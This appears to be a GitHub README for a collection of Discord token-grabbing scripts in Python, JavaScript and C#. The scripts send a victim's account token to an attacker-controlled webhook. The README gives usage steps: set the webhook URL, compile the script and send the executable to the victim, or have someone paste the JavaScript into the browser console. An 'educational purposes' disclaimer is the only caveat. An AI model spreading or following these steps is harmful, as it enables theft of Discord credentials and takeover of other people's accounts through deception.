Skip to content

Latest commit

 

History

History
34 lines (28 loc) · 679 Bytes

README.md

File metadata and controls

34 lines (28 loc) · 679 Bytes

Discord Token Grabbers on Python, Javascript and C#

Simple scripts that grabs the token and sends it through a webhook

  • NOTE: Only made for educational purposes!

Usage

Put your Discord webhook url

  • Python
WEBHOOK_URL = "HERE"
  • Javascript
var webhook = "HERE"
  • C#
string WEBHOOK_URL = "HERE";

In case of using Javascript

  • Press ctrl + shift + i
  • Go to "console"
  • Paste the code and press enter

In case of using Python or C#

  • First you need to compile your code
  • Then send the executable file to the victim

Tested on:

  • Windos 10
  • Chrome